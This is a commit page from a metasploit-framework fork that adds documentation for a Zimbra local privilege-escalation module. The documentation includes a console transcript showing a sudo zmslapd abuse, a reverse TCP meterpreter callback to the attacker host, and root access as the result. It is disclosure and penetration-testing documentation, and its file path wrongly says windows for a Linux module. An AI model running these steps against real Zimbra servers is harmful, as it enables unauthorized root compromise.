dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Add documentation

This commit is contained in:
Ron Bowes 2022-07-26 10:53:55 -07:00 committed by bwatters
parent 6e8d04ddc9
commit be25e1fc77
1 changed files with 47 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

47
documentation/modules/exploit/windows/local/zimbra_slapper_priv_esc.md Normal file
View File

@ -0,0 +1,47 @@
## Vulnerable Application
Currently, as of 2022-07-26, all versions of Zimbra are vulnerable. Presumably they'll patch it eventually - I have an open security ticket with Zimbra.
## Verification Steps
Install Zimbra on any supported Linux version and get a session as the `zimbra` user. I used Ubuntu 18.04 for testing, and then CVE-2022-30333 to exploit, but this will work on a fully patched system as well. Then...
```
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
10 meterpreter x86/linux zimbra @ zimbra.example.org 10.0.0.146:4444 -> 10.0.0.154:39800 (10.0.0.154)
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > use exploit/linux/local/zimbra_slapper_priv_esc
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > set SESSION 10
SESSION => 10
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > exploit
[*] Started reverse TCP handler on 10.0.0.146:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Executing: sudo -n -l
[+] The target is vulnerable.
[*] Creating exploit directory: /tmp/.5kq9XO
[*] Attempting to trigger payload: sudo /opt/zimbra/libexec/zmslapd -u root -g root -f /tmp/.5kq9XO/.1wNk1h3
[*] Sending stage (3020772 bytes) to 10.0.0.154
[+] Deleted /tmp/.5kq9XO
[*] Meterpreter session 13 opened (10.0.0.146:4444 -> 10.0.0.154:40044) at 2022-07-21 14:04:12 -0700
meterpreter > getuid
Server username: root
```
## Options
### SUDO_PATH
The path to `sudo` on the host. If we have a proper environment with `$PATH` set, which we generally do, simply `sudo` is fine.
### ZIMBRA_BASE
The base where Zimbra is installed. Zimbra typically installs to `/opt/zimbra`, and I'm not even sure if it _can_ install elsewhere, so this default should be fine.